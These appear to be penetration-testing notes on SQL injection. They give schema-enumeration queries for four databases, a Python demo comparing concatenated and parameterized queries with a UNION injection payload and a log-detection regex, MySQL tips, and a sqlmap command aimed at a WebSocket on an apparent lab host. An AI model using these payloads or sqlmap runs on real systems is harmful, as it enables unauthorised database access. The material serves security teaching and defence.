
SQL Injection

Extract table and column names

Oracle

SELECT LISTAGG(table_name, ',') FROM all_tables

SELECT LISTAGG(column_name, ',') FROM all_tab_columns
WHERE table_name = 'TABLE-NAME-HERE'

Microsoft

SELECT STRING_AGG(table_name, CHAR(44)) FROM information_schema.tables

SELECT STRING_AGG(column_name, CHAR(44)) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'

PostgreSQL

SELECT STRING_AGG(table_name, ',') FROM information_schema.tables

SELECT STRING_AGG(column_name, ',') FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'

MySQL

SELECT GROUP_CONCAT(table_name) FROM information_schema.tables

SELECT GROUP_CONCAT(column_name) FROM information_schema.columns
WHERE table_name = 'TABLE-NAME-HERE'

Reference: portswigger.net - SQL injection cheat sheet.
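As an added example that is not part of the original cheat sheet, the Python script below shows why these catalogue queries only work against dynamically concatenated SQL: a lookup built by string concatenation sits beside its parameterized form, both run against a constructed in-memory SQLite database (sqlite_master standing in for information_schema), and a small check flags catalogue-plus-aggregator statements of the kind listed above in query logs. The schema, table names, inputs and function names are all constructed for this example.

```python
import re
import sqlite3

# Constructed in-memory schema standing in for the application database (assumption:
# SQLite, whose sqlite_master catalogue plays the role of information_schema here).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER, total REAL);
INSERT INTO users VALUES (1, 'alice', 'h1'), (2, 'bob', 'h2');
"""

def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def build_vulnerable(username):
    # String concatenation: the value is spliced into the SQL grammar itself.
    return "SELECT username FROM users WHERE username = '" + username + "'"

def lookup_vulnerable(conn, username):
    return [row[0] for row in conn.execute(build_vulnerable(username))]

def lookup_parameterized(conn, username):
    # Placeholder binding: the driver passes the value as data, never as SQL text.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

# Catalogue tables and aggregators taken from the queries on this page, plus SQLite's catalogue.
CATALOGUE = re.compile(
    r"\b(information_schema\.(tables|columns)|all_tables|all_tab_columns|sqlite_master)\b", re.I)
AGGREGATOR = re.compile(r"\b(group_concat|string_agg|listagg)\s*\(", re.I)

def looks_like_schema_enumeration(sql):
    """Detection check for query logs: a catalogue table combined with an aggregating function."""
    return bool(CATALOGUE.search(sql) and AGGREGATOR.search(sql))

# Constructed input applying the page's GROUP_CONCAT trick to SQLite's catalogue table.
ENUM_INPUT = "' UNION SELECT group_concat(name) FROM sqlite_master WHERE type='table'--"

if __name__ == "__main__":
    conn = connect()
    print(lookup_vulnerable(conn, ENUM_INPUT))      # one row listing every table name
    print(lookup_parameterized(conn, ENUM_INPUT))   # [] : the input is just an unmatched username
    print(looks_like_schema_enumeration(build_vulnerable(ENUM_INPUT)))  # True
```

Running the script shows the concatenated query returning the table list while the parameterized query treats the same input as a literal value and returns nothing.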

Privileges

MySQL

SHOW GRANTS;

Others

MySQL

Use the --vertical option of the mysql client to enable vertical output, or end a query with \G instead of a semicolon, for example: SELECT * FROM users \G.

> SELECT * FROM city WHERE countrycode='AUT';
*************************** 1. row ***************************
    ID: 1523
    Name: Wien
    CountryCode: AUT
    District: Wien
    Info: {"Population": 1608144}

Source: dev.mysql.com.

SQL Injection in Websockets

Example command using sqlmap:

$ sqlmap -u "ws://soc-player.soccer.htb:9091" --data='{"id":"57636*"}'

Another approach is to use an HTTP server as a proxy in front of the WebSocket: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html